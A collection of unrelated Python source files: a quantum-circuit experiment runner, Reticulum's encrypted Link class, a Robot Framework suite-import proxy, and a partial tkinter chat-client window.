np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/loss_values_haar.csv", loss_values_haar, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/thetass_haar.csv", thetass_haar, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/traces_haar.csv", traces_haar, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/fidelities_haar.csv", fidelities_haar, delimiter=",")
if __name__ == "__main__":
# creating thread
num_qubits = 5
num_layers = [1, 2, 3, 4, 5]
t_haar = []
for i in num_layers:
t_haar.append(multiprocessing.Process(target = run_haar, args=(i, num_qubits)))
for i in range(0, len(num_layers)):
t_haar[i].start()
for i in range(0, len(num_layers)):
t_haar[i].join()
print("Done!")
|
Link.py
|
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.fernet import Fernet
from time import sleep
import vendor.umsgpack as umsgpack
import threading
import base64
import time
import RNS
import traceback
class LinkCallbacks:
def __init__(self):
self.link_established = None
self.link_closed = None
self.packet = None
self.resource_started = None
self.resource_concluded = None
class Link:
CURVE = ec.SECP256R1()
ECPUBSIZE = 91
BLOCKSIZE = 16
# TODO: This should not be hardcoded,
# but calculated from something like
# first-hop RTT latency and distance
DEFAULT_TIMEOUT = 15.0
TIMEOUT_FACTOR = 3
KEEPALIVE = 120
PENDING = 0x00
HANDSHAKE = 0x01
ACTIVE = 0x02
STALE = 0x03
CLOSED = 0x04
TIMEOUT = 0x01
INITIATOR_CLOSED = 0x02
DESTINATION_CLOSED = 0x03
ACCEPT_NONE = 0x00
ACCEPT_APP = 0x01
ACCEPT_ALL = 0x02
resource_strategies = [ACCEPT_NONE, ACCEPT_APP, ACCEPT_ALL]
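    # Link state machine, roughly as driven by the watchdog below:
    #   PENDING   -> HANDSHAKE  when the peer's public key / proof is processed
    #   HANDSHAKE -> ACTIVE     once the RTT packet round trip completes
    #   ACTIVE    -> STALE      after `keepalive` seconds without inbound traffic
    #   STALE     -> CLOSED     if nothing arrives within rtt * timeout_factor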
@staticmethod
def validateRequest(owner, data, packet):
if len(data) == (Link.ECPUBSIZE):
try:
link = Link(owner = owner, peer_pub_bytes = data[:Link.ECPUBSIZE])
link.setLinkID(packet)
link.destination = packet.destination
RNS.log("Validating link request "+RNS.prettyhexrep(link.link_id), RNS.LOG_VERBOSE)
link.handshake()
link.attached_interface = packet.receiving_interface
link.prove()
link.request_time = time.time()
RNS.Transport.registerLink(link)
link.last_inbound = time.time()
link.start_watchdog()
# TODO: Why was link_established callback here? Seems weird
# to call this before RTT packet has been received
#if self.owner.callbacks.link_established != None:
# self.owner.callbacks.link_established(link)
RNS.log("Incoming link request "+str(link)+" accepted, waiting for RTT packet", RNS.LOG_VERBOSE)
return link
except Exception as e:
RNS.log("Validating link request failed", RNS.LOG_VERBOSE)
traceback.print_exc()
return None
else:
RNS.log("Invalid link request payload size, dropping request", RNS.LOG_VERBOSE)
return None
def __init__(self, destination=None, owner=None, peer_pub_bytes = None):
if destination != None and destination.type != RNS.Destination.SINGLE:
raise TypeError("Links can only be established to the \"single\" destination type")
self.rtt = None
self.callbacks = LinkCallbacks()
self.resource_strategy = Link.ACCEPT_NONE
self.outgoing_resources = []
self.incoming_resources = []
self.last_inbound = 0
self.last_outbound = 0
self.tx = 0
self.rx = 0
self.txbytes = 0
self.rxbytes = 0
self.default_timeout = Link.DEFAULT_TIMEOUT
self.proof_timeout = self.default_timeout
self.timeout_factor = Link.TIMEOUT_FACTOR
self.keepalive = Link.KEEPALIVE
self.watchdog_lock = False
self.status = Link.PENDING
self.type = RNS.Destination.LINK
self.owner = owner
self.destination = destination
self.attached_interface = None
self.__encryption_disabled = False
if self.destination == None:
self.initiator = False
else:
self.initiator = True
self.prv = ec.generate_private_key(Link.CURVE, default_backend())
self.pub = self.prv.public_key()
self.pub_bytes = self.pub.public_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
if peer_pub_bytes == None:
self.peer_pub = None
self.peer_pub_bytes = None
else:
self.loadPeer(peer_pub_bytes)
if (self.initiator):
self.request_data = self.pub_bytes
self.packet = RNS.Packet(destination, self.request_data, packet_type=RNS.Packet.LINKREQUEST)
self.packet.pack()
self.setLinkID(self.packet)
RNS.Transport.registerLink(self)
self.request_time = time.time()
self.start_watchdog()
self.packet.send()
RNS.log("Link request "+RNS.prettyhexrep(self.link_id)+" sent to "+str(self.destination), RNS.LOG_VERBOSE)
def loadPeer(self, peer_pub_bytes):
self.peer_pub_bytes = peer_pub_bytes
self.peer_pub = serialization.load_der_public_key(peer_pub_bytes, backend=default_backend())
if not hasattr(self.peer_pub, "curve"):
self.peer_pub.curve = Link.CURVE
def setLinkID(self, packet):
self.link_id = RNS.Identity.truncatedHash(packet.raw)
self.hash = self.link_id
def handshake(self):
self.status = Link.HANDSHAKE
self.shared_key = self.prv.exchange(ec.ECDH(), self.peer_pub)
self.derived_key = HKDF(
algorithm=hashes.SHA256(),
length=32,
salt=self.getSalt(),
info=self.getContext(),
backend=default_backend()
).derive(self.shared_key)
def prove(self):
signed_data = self.link_id+self.pub_bytes
signature = self.owner.identity.sign(signed_data)
proof_data = self.pub_bytes+signature
proof = RNS.Packet(self, proof_data, packet_type=RNS.Packet.PROOF, context=RNS.Packet.LRPROOF)
proof.send()
def prove_packet(self, packet):
signature = self.sign(packet.packet_hash)
# TODO: Hardcoded as explicit proof for now
# if RNS.Reticulum.should_use_implicit_proof():
# proof_data = signature
# else:
# proof_data = packet.packet_hash + signature
proof_data = packet.packet_hash + signature
proof = RNS.Packet(self, proof_data, RNS.Packet.PROOF)
proof.send()
def validateProof(self, packet):
if self.initiator:
peer_pub_bytes = packet.data[:Link.ECPUBSIZE]
signed_data = self.link_id+peer_pub_bytes
signature = packet.data[Link.ECPUBSIZE:RNS.Identity.KEYSIZE/8+Link.ECPUBSIZE]
if self.destination.identity.validate(signature, signed_data):
self.loadPeer(peer_pub_bytes)
self.handshake()
self.rtt = time.time() - self.request_time
self.attached_interface = packet.receiving_interface
RNS.Transport.activateLink(self)
RNS.log("Link "+str(self)+" established with "+str(self.destination)+", RTT is "+str(self.rtt), RNS.LOG_VERBOSE)
rtt_data = umsgpack.packb(self.rtt)
rtt_packet = RNS.Packet(self, rtt_data, context=RNS.Packet.LRRTT)
RNS.log("Sending RTT packet", RNS.LOG_EXTREME);
rtt_packet.send()
self.status = Link.ACTIVE
if self.callbacks.link_established != None:
self.callbacks.link_established(self)
else:
RNS.log("Invalid link proof signature received by "+str(self), RNS.LOG_VERBOSE)
# TODO: should we really do this, or just wait
# for a valid one? Needs analysis.
self.teardown()
def rtt_packet(self, packet):
try:
# TODO: This is crude, we should use the delta
# to model a more representative per-bit round
# trip time, and use that to set a sensible RTT
# expectancy for the link. This will have to do
# for now though.
measured_rtt = time.time() - self.request_time
plaintext = self.decrypt(packet.data)
rtt = umsgpack.unpackb(plaintext)
self.rtt = max(measured_rtt, rtt)
self.status = Link.ACTIVE
# TODO: Link established callback moved here, ok?
if self.owner.callbacks.link_established != None:
self.owner.callbacks.link_established(self)
except Exception as e:
RNS.log("Error occurred while processing RTT packet, tearing down link", RNS.LOG_ERROR)
traceback.print_exc()
self.teardown()
def getSalt(self):
return self.link_id
def getContext(self):
return None
def teardown(self):
if self.status != Link.PENDING and self.status != Link.CLOSED:
teardown_packet = RNS.Packet(self, self.link_id, context=RNS.Packet.LINKCLOSE)
teardown_packet.send()
self.status = Link.CLOSED
if self.initiator:
self.teardown_reason = Link.INITIATOR_CLOSED
else:
self.teardown_reason = Link.DESTINATION_CLOSED
self.link_closed()
def teardown_packet(self, packet):
try:
plaintext = self.decrypt(packet.data)
if plaintext == self.link_id:
self.status = Link.CLOSED
if self.initiator:
self.teardown_reason = Link.DESTINATION_CLOSED
else:
self.teardown_reason = Link.INITIATOR_CLOSED
self.link_closed()
except Exception as e:
pass
def link_closed(self):
for resource in self.incoming_resources:
resource.cancel()
for resource in self.outgoing_resources:
resource.cancel()
self.prv = None
self.pub = None
self.pub_bytes = None
self.shared_key = None
self.derived_key = None
if self.callbacks.link_closed != None:
self.callbacks.link_closed(self)
def start_watchdog(self):
thread = threading.Thread(target=self.__watchdog_job)
thread.setDaemon(True)
thread.start()
def __watchdog_job(self):
while not self.status == Link.CLOSED:
while (self.watchdog_lock):
sleep(max(self.rtt, 0.025))
if not self.status == Link.CLOSED:
# Link was initiated, but no response
# from destination yet
if self.status == Link.PENDING:
next_check = self.request_time + self.proof_timeout
sleep_time = next_check - time.time()
if time.time() >= self.request_time + self.proof_timeout:
RNS.log("Link establishment timed out", RNS.LOG_VERBOSE)
self.status = Link.CLOSED
self.teardown_reason = Link.TIMEOUT
self.link_closed()
sleep_time = 0.001
elif self.status == Link.HANDSHAKE:
next_check = self.request_time + self.proof_timeout
sleep_time = next_check - time.time()
if time.time() >= self.request_time + self.proof_timeout:
RNS.log("Timeout waiting for RTT packet from link initiator", RNS.LOG_DEBUG)
self.status = Link.CLOSED
self.teardown_reason = Link.TIMEOUT
self.link_closed()
sleep_time = 0.001
elif self.status == Link.ACTIVE:
if time.time() >= self.last_inbound + self.keepalive:
sleep_time = self.rtt * self.timeout_factor
self.status = Link.STALE
if self.initiator:
self.send_keepalive()
else:
sleep_time = (self.last_inbound + self.keepalive) - time.time()
elif self.status == Link.STALE:
sleep_time = 0.001
self.status = Link.CLOSED
self.teardown_reason = Link.TIMEOUT
self.link_closed()
if sleep_time == 0:
RNS.log("Warning! Link watchdog sleep time of 0!", RNS.LOG_ERROR)
if sleep_time == None or sleep_time < 0:
RNS.log("Timing error! Closing Reticulum now.", RNS.LOG_CRITICAL)
RNS.panic()
sleep(sleep_time)
def send_keepalive(self):
keepalive_packet = RNS.Packet(self, chr(0xFF), context=RNS.Packet.KEEPALIVE)
keepalive_packet.send()
def receive(self, packet):
self.watchdog_lock = True
if not self.status == Link.CLOSED and not (self.initiator and packet.context == RNS.Packet.KEEPALIVE and packet.data == chr(0xFF)):
if packet.receiving_interface != self.attached_interface:
RNS.log("Link-associated packet received on unexpected interface! Someone might be trying to manipulate your communication!", RNS.LOG_ERROR)
else:
self.last_inbound = time.time()
self.rx += 1
self.rxbytes += len(packet.data)
if self.status == Link.STALE:
self.status = Link.ACTIVE
if packet.packet_type == RNS.Packet.DATA:
if packet.context == RNS.Packet.NONE:
plaintext = self.decrypt(packet.data)
if self.callbacks.packet != None:
self.callbacks.packet(plaintext, packet)
if self.destination.proof_strategy == RNS.Destination.PROVE_ALL:
packet.prove()
elif self.destination.proof_strategy == RNS.Destination.PROVE_APP:
if self.destination.callbacks.proof_requested:
self.destination.callbacks.proof_requested(packet)
elif packet.context == RNS.Packet.LRRTT:
if not self.initiator:
self.rtt_packet(packet)
elif packet.context == RNS.Packet.LINKCLOSE:
self.teardown_packet(packet)
elif packet.context == RNS.Packet.RESOURCE_ADV:
packet.plaintext = self.decrypt(packet.data)
if self.resource_strategy == Link.ACCEPT_NONE:
pass
elif self.resource_strategy == Link.ACCEPT_APP:
if self.callbacks.resource != None:
self.callbacks.resource(packet)
elif self.resource_strategy == Link.ACCEPT_ALL:
RNS.Resource.accept(packet, self.callbacks.resource_concluded)
elif packet.context == RNS.Packet.RESOURCE_REQ:
plaintext = self.decrypt(packet.data)
if ord(plaintext[:1]) == RNS.Resource.HASHMAP_IS_EXHAUSTED:
resource_hash = plaintext[1+RNS.Resource.MAPHASH_LEN:RNS.Identity.HASHLENGTH/8+1+RNS.Resource.MAPHASH_LEN]
else:
resource_hash = plaintext[1:RNS.Identity.HASHLENGTH/8+1]
for resource in self.outgoing_resources:
if resource.hash == resource_hash:
resource.request(plaintext)
elif packet.context == RNS.Packet.RESOURCE_HMU:
plaintext = self.decrypt(packet.data)
resource_hash = plaintext[:RNS.Identity.HASHLENGTH/8]
for resource in self.incoming_resources:
if resource_hash == resource.hash:
resource.hashmap_update_packet(plaintext)
elif packet.context == RNS.Packet.RESOURCE_ICL:
plaintext = self.decrypt(packet.data)
resource_hash = plaintext[:RNS.Identity.HASHLENGTH/8]
for resource in self.incoming_resources:
if resource_hash == resource.hash:
resource.cancel()
elif packet.context == RNS.Packet.KEEPALIVE:
if not self.initiator and packet.data == chr(0xFF):
keepalive_packet = RNS.Packet(self, chr(0xFE), context=RNS.Packet.KEEPALIVE)
keepalive_packet.send()
# TODO: find the most efficient way to allow multiple
# transfers at the same time, sending resource hash on
# each packet is a huge overhead. Probably some kind
# of hash -> sequence map
elif packet.context == RNS.Packet.RESOURCE:
for resource in self.incoming_resources:
resource.receive_part(packet)
elif packet.packet_type == RNS.Packet.PROOF:
if packet.context == RNS.Packet.RESOURCE_PRF:
resource_hash = packet.data[0:RNS.Identity.HASHLENGTH/8]
for resource in self.outgoing_resources:
if resource_hash == resource.hash:
resource.validateProof(packet.data)
self.watchdog_lock = False
def encrypt(self, plaintext):
if self.__encryption_disabled:
return plaintext
try:
fernet = Fernet(base64.urlsafe_b64encode(self.derived_key))
ciphertext = base64.urlsafe_b64decode(fernet.encrypt(plaintext))
return ciphertext
except Exception as e:
RNS.log("Encryption on link "+str(self)+" failed. The contained exception was: "+str(e), RNS.LOG_ERROR)
def decrypt(self, ciphertext):
if self.__encryption_disabled:
return ciphertext
try:
fernet = Fernet(base64.urlsafe_b64encode(self.derived_key))
plaintext = fernet.decrypt(base64.urlsafe_b64encode(ciphertext))
return plaintext
except Exception as e:
RNS.log("Decryption failed on link "+str(self)+". The contained exception was: "+str(e), RNS.LOG_ERROR)
traceback.print_exc()
def sign(self, message):
return self.prv.sign(message, ec.ECDSA(hashes.SHA256()))
def validate(self, signature, message):
try:
self.peer_pub.verify(signature, message, ec.ECDSA(hashes.SHA256()))
return True
except Exception as e:
return False
def link_established_callback(self, callback):
self.callbacks.link_established = callback
def link_closed_callback(self, callback):
self.callbacks.link_closed = callback
def packet_callback(self, callback):
self.callbacks.packet = callback
# Called when an incoming resource transfer is started
def resource_started_callback(self, callback):
self.callbacks.resource_started = callback
# Called when a resource transfer is concluded
def resource_concluded_callback(self, callback):
self.callbacks.resource_concluded = callback
def resource_concluded(self, resource):
if resource in self.incoming_resources:
self.incoming_resources.remove(resource)
if resource in self.outgoing_resources:
self.outgoing_resources.remove(resource)
def set_resource_strategy(self, resource_strategy):
if resource_strategy not in Link.resource_strategies:
raise TypeError("Unsupported resource strategy")
else:
self.resource_strategy = resource_strategy
def register_outgoing_resource(self, resource):
self.outgoing_resources.append(resource)
def register_incoming_resource(self, resource):
self.incoming_resources.append(resource)
def cancel_outgoing_resource(self, resource):
if resource in self.outgoing_resources:
self.outgoing_resources.remove(resource)
else:
RNS.log("Attempt to cancel a non-existing incoming resource", RNS.LOG_ERROR)
def cancel_incoming_resource(self, resource):
if resource in self.incoming_resources:
self.incoming_resources.remove(resource)
else:
RNS.log("Attempt to cancel a non-existing incoming resource", RNS.LOG_ERROR)
def ready_for_new_resource(self):
if len(self.outgoing_resources) > 0:
return False
else:
return True
def disableEncryption(self):
if (RNS.Reticulum.should_allow_unencrypted()):
RNS.log("The link "+str(self)+" was downgraded to an encryptionless link", RNS.LOG_NOTICE)
self.__encryption_disabled = True
else:
RNS.log("Attempt to disable encryption on link, but encryptionless links are not allowed by config.", RNS.LOG_CRITICAL)
RNS.log("Shutting down Reticulum now!", RNS.LOG_CRITICAL)
RNS.panic()
def encryption_disabled(self):
return self.__encryption_disabled
def __str__(self):
return RNS.prettyhexrep(self.link_id)
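# --- Illustrative sketch, not part of the original Link implementation ---
# The encrypt()/decrypt() methods above strip the urlsafe-base64 layer from a
# Fernet token so that only the raw token bytes travel over the link, and add
# it back before decryption. The standalone round trip below demonstrates that
# idea; the key is freshly generated here, whereas a real link derives it from
# the handshake.
if __name__ == "__main__":
    import base64
    from cryptography.fernet import Fernet

    key = Fernet.generate_key()                   # stand-in for the derived link key
    fernet = Fernet(key)
    token = fernet.encrypt(b"hello link")         # urlsafe-base64 encoded Fernet token
    wire_bytes = base64.urlsafe_b64decode(token)  # raw bytes, as sent over the link
    restored = fernet.decrypt(base64.urlsafe_b64encode(wire_bytes))
    assert restored == b"hello link"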
|
SuiteVisitorImportProxy.py
|
#
# Copyright 2017 Nokia Solutions and Networks
# Licensed under the Apache License, Version 2.0,
# see license.txt file for details.
#
import threading
import sys
import json
import types
import inspect
import re
from robot.running.builder import TestSuiteBuilder
from robot.api import SuiteVisitor
from robot.running import TestLibrary
from robot.running.testlibraries import _BaseTestLibrary
from robot.running.handlers import _DynamicHandler, _JavaHandler
from robot.output import LOGGER, Message
class RedTestSuiteBuilder(TestSuiteBuilder):
""" switch off empty suite removing """
def _parse_and_build(self, path):
suite = self._build_suite(self._parse(path))
return suite
class SuiteVisitorImportProxy(SuiteVisitor):
""" suite names should be passed as arguments """
LIB_IMPORT_TIMEOUT = 60
def __init__(self, *args):
self.f_suites = [name for name in args if name]
self.__wrap_importer()
def __wrap_importer(self):
import robot
import robot.running.namespace
import robot.running.importer
current = robot.running.namespace.IMPORTER
to_wrap = current if isinstance(current, robot.running.importer.Importer) else current.importer
robot.running.namespace.IMPORTER = RedImporter(to_wrap, self.LIB_IMPORT_TIMEOUT)
def visit_suite(self, suite):
if suite.parent:
suite.parent.tests.clear()
suite.parent.keywords.clear()
else:
# when first suite is visited all suites are counted and message is send to server
msg = json.dumps({'suite_count': self.__count_suites(suite)})
LOGGER.message(Message(message=msg, level='NONE'))
if len(suite.tests) == 0 or suite.test_count == 0:
current_suite = RedTestSuiteBuilder().build(suite.source)
if len(self.f_suites) == 0:
suite.suites = current_suite.suites
else:
suite.suites = self.__filter_by_name(current_suite.suites)
suite.tests.clear()
suite.keywords.clear()
suite.suites.visit(self)
def visit_test(self, test):
# test visiting skipped
pass
def visit_keyword(self, kw):
# keyword visiting skipped
pass
def visit_message(self, msg):
# message visiting skipped
pass
def __count_suites(self, suite):
if suite.suites:
return 1 + sum(self.__count_suites(s) for s in suite.suites)
else:
return 1
def __filter_by_name(self, suites):
matched_suites = []
for suite in suites:
for s_name in self.f_suites:
if suite not in matched_suites and self.__suite_name_matches(suite, s_name):
matched_suites.append(suite)
suite.suites = self.__filter_by_name(suite.suites)
return matched_suites
def __suite_name_matches(self, suite, s_name):
longpath = suite.longname.lower().replace('_', ' ')
normalized_s_name = s_name.lower().replace('_', ' ')
matches = lambda x: x == '' or x.startswith('.') or x.startswith('*') or x.startswith('?')
if len(longpath) >= len(normalized_s_name) and longpath.startswith(normalized_s_name):
return matches(longpath.replace(normalized_s_name, ''))
elif len(longpath) < len(normalized_s_name) and normalized_s_name.startswith(longpath):
return matches(normalized_s_name.replace(longpath, ''))
return False
class RedImporter(object):
def __init__(self, importer, lib_import_timeout):
self.importer = importer
self.lib_import_timeout = int(lib_import_timeout)
self.func = None
self.lock = threading.Lock()
self.cached_lib_items = list()
self.cached_kw_items = set()
def __getattr__(self, name):
self.lock.acquire()
try:
if hasattr(self.importer, name):
func = getattr(self.importer, name)
return lambda *args, **kwargs: self._wrap(func, args, kwargs)
raise AttributeError(name)
finally:
self.lock.release()
def _wrap(self, func, args, kwargs):
if isinstance(func, types.MethodType):
if func.__name__ == 'import_library':
return self._handle_lib_import(func, args, kwargs)
else:
return func(*args, **kwargs)
else:
return func(self.importer, *args, **kwargs)
def _handle_lib_import(self, func, args, kwargs):
libs = []
errors = []
lib_cached = self._get_lib_from_cache(args[0], args[1])
if lib_cached:
libs.append(lib_cached.lib)
errors = lib_cached.errors
else:
try:
def to_call():
try:
libs.append(func(*args, **kwargs))
except:
errors.append(sys.exc_info())
t = threading.Thread(target=to_call)
t.daemon = True
t.start()
t.join(timeout=self.lib_import_timeout)
except:
errors.append(sys.exc_info())
if len(libs) > 0:
library = libs[0]
else:
try:
library = TestLibrary(args[0], args[1], args[2], create_handlers=False)
except:
try:
library = _BaseTestLibrary(libcode=None, name=args[0], args=args[1], source=None, variables=args[2])
except:
try:
library = _BaseTestLibrary(libcode=None, name=args[0], args=[], source=None, variables=args[3])
except:
errors.append(sys.exc_info())
if lib_cached is None:
self.cached_lib_items.append(LibItem(args[0], args[1], library, errors))
for e in errors:
msg = '{LIB_ERROR: ' + args[0] + ', value: VALUE_START(' + str(e) + ')VALUE_END, lib_file_import:' + str(
library.source) + '}'
LOGGER.message(Message(message=msg, level='FAIL'))
self._handle_keywords(library)
return library
def _get_lib_from_cache(self, name, args):
for cached_lib in self.cached_lib_items:
if cached_lib.name == name:
if len(cached_lib.args) == len(args):
for cached_arg, arg in zip(cached_lib.args, args):
if cached_arg != arg:
return None
return cached_lib
return None
def _handle_keywords(self, library):
if library and hasattr(library, 'handlers'):
for keyword in library.handlers:
if keyword not in self.cached_kw_items and not isinstance(keyword, _JavaHandler):
try:
keyword_source = PythonKeywordSource(keyword)
msg = json.dumps({'keyword': dict(keyword_source.__dict__)}, sort_keys=True)
LOGGER.message(Message(message=msg, level='NONE'))
except:
pass # TODO: add logging
finally:
self.cached_kw_items.add(keyword)
class LibItem(object):
def __init__(self, name, args, lib=None, errors=None):
self.name = name
self.args = args
self.lib = lib
self.errors = errors if errors is not None else []
class PythonKeywordSource(object):
def __init__(self, keyword):
self.name = keyword.name
self.libraryName = keyword.library.name
source = self._find_source(keyword)
self.filePath = source[0]
self.line = source[1]
self.offset = source[2]
self.length = source[3]
def _find_source(self, keyword):
function = self._resolve_function(keyword)
path = inspect.getfile(function)
source = inspect.getsourcelines(function)
for lineIdx, line in enumerate(source[0]):
m = re.search(r'(?<=def)(\s*)([^ \t\n\r\f\v(]+)', line)
if m is not None:
line = source[1] + lineIdx - 1
offset = m.start(2)
length = len(m.group(2))
return path, line, offset, length
return path, 0, 0, 0
@staticmethod
def _resolve_function(keyword):
if isinstance(keyword, _DynamicHandler):
return keyword.library._libcode.__dict__[keyword._run_keyword_method_name]
elif keyword._method:
return keyword._method
else:
return keyword._get_handler(keyword.library.get_instance(), keyword._handler_name)
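# --- Illustrative usage sketch, not part of the original module ---
# The proxy is a SuiteVisitor that takes the names of suites to keep as
# constructor arguments; one way to hook it in is as a Robot Framework
# pre-run modifier. The 'tests' path and suite name below are placeholders.
if __name__ == '__main__':
    import robot

    modifier = SuiteVisitorImportProxy('My Suite')
    robot.run('tests', prerunmodifier=modifier)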
|
client.py
|
import sys
import os
import tkinter as tk
from threading import Thread
from VectorMessenger.MessengerCore.Helpers import Global as h
from VectorMessenger.MessengerCore.Helpers import Client as h_cl
from VectorMessenger.MessengerCore.CoreClient import MessengerClient
from VectorMessenger.MessengerCore.Encryption import VMCrypt
class VM_MainWindow:
def __init__(self, root: object):
def _on_close():
self.messenger.stop_message_polling()
root.destroy()
root.protocol('WM_DELETE_WINDOW', _on_close)
self.root = root
# Header Menu
self.HM_Root = tk.Menu(root)
root.configure(menu=self.HM_Root)
self.HM_Theme = tk.Menu(self.HM_Root, tearoff=0)
self.HM_Root.add_cascade(label='Theme', menu=self.HM_Theme)
self.HM_Theme.add_command(label='Light', command=lambda: self.set_color_scheme(0))
self.HM_Theme.add_command(label='Dark', command=lambda: self.set_color_scheme(1))
self.HM_Advanced = tk.Menu(self.HM_Root, tearoff=0)
self.HM_Root.add_cascade(label='Settings', command=self.show_window_settings)
self.HM_Root.add_cascade(label='Advanced', menu=self.HM_Advanced)
self.HM_Advanced.add_command(label='Debug Console', command=self.show_debug_console)
# Top
self.frame_top = tk.Frame(root)
self.chat_messages = tk.Text(self.frame_top, width=48, height=26, wrap=tk.WORD, state=tk.DISABLED, font='Arial 13')
self.chat_scroll = tk.Scrollbar(self.frame_top, command=self.chat_messages.yview)
self.chat_messages.config(yscrollcommand=self.chat_scroll.set)
self.frame_top.grid(column=0, row=0, sticky="NSEW")
self.chat_messages.grid(column=0, row=0, sticky="NSEW")
self.chat_scroll.grid(column=1, row=0, sticky="NS")
self.frame_top.columnconfigure(0, weight=1)
self.frame_top.rowconfigure(0, weight=1)
# Bottom
self.frame_bot = tk.Frame(root)
self.chat_message_input = tk.Entry(self.frame_bot, width=50)
self.chat_message_input.bind('<Return>', self.send_message)
self.chat_btn_send_message = tk.Button(self.frame_bot, text="\u27A2", font=20, relief=tk.FLAT, command=self.send_message)
self.frame_bot.grid(column=0, row=1, sticky="NSEW")
self.chat_message_input.grid(column=0, row=0, sticky="NSEW")
self.chat_btn_send_message.grid(column=1, row=0, sticky="SE")
self.frame_bot.columnconfigure(0, weight=1)
self.frame_bot.rowconfigure(0, weight=0)
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
# Update checker
if '--disable-updater' not in sys.argv:
self.HM_Root.add_command(label='', state=tk.DISABLED)
self.update_checker = h_cl.UpdateChecker(self.HM_Root)
Thread(target=self.update_checker.check, daemon=True).start()
def init_messenger(self):
self.messenger = MessengerClient(self)
self.messenger.register_user()
def show_message(self, text: str):
""" Will show the message in chat ui """
text = text + '\n'
self.chat_messages.config(state=tk.NORMAL)
self.chat_messages.insert(tk.END, text)
self.chat_messages.config(state=tk.DISABLED)
self.chat_messages.see(tk.END)
def send_message(self, *args):
message = self.chat_message_input.get()
self.chat_message_input.delete(0, tk.END)
if len(message) > 0:
self.messenger.send_message(message)
def refresh_color_scheme(self, screen=0, refreshAll=False):
"""
Refresh the color theme from the JSON config file
Keyword Arguments:
screen {int} -- Screen whose colors should be refreshed. 0 - Root, 1 - Settings (default: {0})
refreshAll {bool} -- Refresh the theme on all screens (default: {False})
"""
if refreshAll:
for i in range(2):
self.refresh_color_scheme(screen=i)
return 0
cfg = h.VMConfig.get(1)
if len(cfg) > 0:
theme_name = 'theme_' + cfg['ui']['theme_selected']
selected_theme = cfg['ui']['root'][theme_name]
if screen == 0:
def _update_theme_from_dict(theme: dict):
self.frame_top.config(bg=theme['frame_bg'])
self.chat_messages.config(bg=theme['chat_bg'], fg=theme['text'])
self.frame_bot.config(bg=theme['chat_bg'])
self.chat_message_input.config(bg=theme['message_input_bg'], fg=theme['text'])
self.chat_btn_send_message.config(bg=theme['buttond_send_bg'], fg=theme['buttond_send_fg'])
# Font update
self.chat_messages.config(font=cfg['ui']['root']['font'])
self.chat_message_input.config(font=cfg['ui']['root']['font'])
# Theme update
_update_theme_from_dict(selected_theme)
if screen == 1:
pass # TODO: Implement theme refreshing for settings window
if theme_name == 'theme_light':
self.HM_Theme.entryconfig(0, state=tk.DISABLED)
self.HM_Theme.entryconfig(1, state=tk.NORMAL)
elif theme_name == 'theme_dark':
self.HM_Theme.entryconfig(1, state=tk.DISABLED)
self.HM_Theme.entryconfig(0, state=tk.NORMAL)
else:
h.create_log("Can't refresh color theme - config file was not found -> building config from built-in values and trying again")
h.VMConfig.init(1)
self.refresh_color_scheme(screen, refreshAll)
def set_color_scheme(self, mode: int):
"""
Set color scheme to selected mode
Arguments:
mode {int} -- Theme type (0 - light, 1 - dark)
"""
cfg = h.VMConfig.get(1)
theme = 'light' if mode == 0 else 'dark'
cfg['ui']['theme_selected'] = theme
h.VMConfig.write(cfg, 1)
h.create_log(f'UI Theme set to {theme}')
self.refresh_color_scheme()
def show_window_settings(self):
""" Will show window with settings """
ENTRY_WIDTH = 40
window = tk.Toplevel(self.root)
h_cl.iconbitmap_universal(window)
window.title('Settings')
window.resizable(False, False)
window = tk.Frame(window)
window.grid(row=0, column=0, padx=5, pady=5)
# Username settings
def _reload_uname():
uname_currentLabel.config(text='Current username: ' + h.VMConfig.get(1)['username'])
def _setUname():
username = uname_input.get()
if len(username) > 0:
cfg = h.VMConfig.get(1)
cfg['username'] = username
h.VMConfig.write(cfg, 1)
_reload_uname()
else:
uname_input.delete(0, tk.END)
uname_input.insert(0, "Username can't be empty!")
frame_setUsername = tk.LabelFrame(window, text='Username')
uname_currentLabel = tk.Label(frame_setUsername, text='')
_reload_uname()
uname_input = tk.Entry(frame_setUsername, width=ENTRY_WIDTH)
uname_btn_set = tk.Button(frame_setUsername, text='Set', command=_setUname, height=1, relief=tk.FLAT, bg='#dfdfdf')
frame_setUsername.grid(row=0, column=0, sticky='NSEW')
uname_currentLabel.grid(row=0, column=0, sticky='W')
uname_input.grid(row=1, column=0, sticky='W')
uname_btn_set.grid(row=1, column=1, sticky='EW')
# Advanced
def _reset_cfg():
h.VMConfig.reset(1)
_reload_uname()
_hide_enc_key()
self.refresh_color_scheme(refreshAll=True)
h.create_log('Config file reset complete')
frame_advanced = tk.LabelFrame(window, text='Advanced')
adv_btn_resetConfig = tk.Button(frame_advanced, text='Reset To Defaults', command=_reset_cfg, height=1, relief=tk.FLAT, bg='#dfdfdf')
frame_advanced.grid(row=0, column=1, sticky='NSEW', rowspan=10)
adv_btn_resetConfig.grid(row=0, column=1, sticky='EW', padx=2)
# Encryption settings
def _set_enc_key():
key = ekey_input_field.get()
VMCrypt.set_key(key)
_hide_enc_key()
ekey_warning_label.config(text='Key was successfully set', fg='#009f00')
def _show_enc_key():
ekey_currentKey_label.config(text=f'Current Key: {h.VMConfig.get(1)["aes_key"]}')
def _hide_enc_key():
ekey_currentKey_label.config(text='Current Key: ****')
frame_encKeySettings = tk.LabelFrame(window, text='Encryption Key')
ekey_warning_label = tk.Label(frame_encKeySettings, text='')
ekey_currentKey_label = tk.Label(frame_encKeySettings, text='Current Key: ****', bg='#ffffff')
ekey_btn_showCurrentKey = tk.Button(frame_encKeySettings, text='Show', command=_show_enc_key, height=1, relief=tk.FLAT, bg='#dfdfdf')
ekey_input_field = tk.Entry(frame_encKeySettings, width=ENTRY_WIDTH)
